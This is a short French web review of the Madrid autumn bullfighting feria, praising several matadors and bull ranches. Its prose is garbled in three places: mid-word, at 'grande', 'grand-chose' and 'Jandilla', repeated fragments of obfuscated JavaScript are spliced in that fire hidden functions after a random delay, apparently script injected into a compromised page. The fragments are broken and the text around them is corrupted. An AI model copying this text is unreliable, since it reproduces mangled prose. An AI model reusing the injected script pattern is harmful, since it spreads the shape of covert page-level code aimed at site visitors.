MADRID FERIA D’AUTOMNE : UNE BONNE FERIA

À l’exception de la décevante corrida de Nuñez, le reste de la feria eut un bon niveau. Miguel Abellán réalisa la grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande faena de ce cycle ; Diego Urdiales, la plus torera et parfumée ; Uceda Leal, le meilleur toreo à la cape ; les cuadrillas assurèrent en général ; et les corridas de Puerto de San Lorenzo et Adolfo Martín furent d’un très bon niveau. La novillada de Fuente Ymbro n’a pas dit grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and-chose, et encore moins les novilleros. Cependant, ceux qui toréent sans picadors proposèrent un beau spectacle matinal, surtout Aguilera, le triomphateur, mais aussi Jaime Rodríguez, qui fut blessé à la mise à mort de l’un des bons novillos envoyés par Jandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andilla. Par ailleurs, le public a répondu présent avec de belles entrées et un bon comportement. La Fiesta mérite d’avoir plus d’échos dans les medias qu’elle n’en a.

fotos taurodelta

t2016t2013t2004foto2

Les commentaires sont fermés.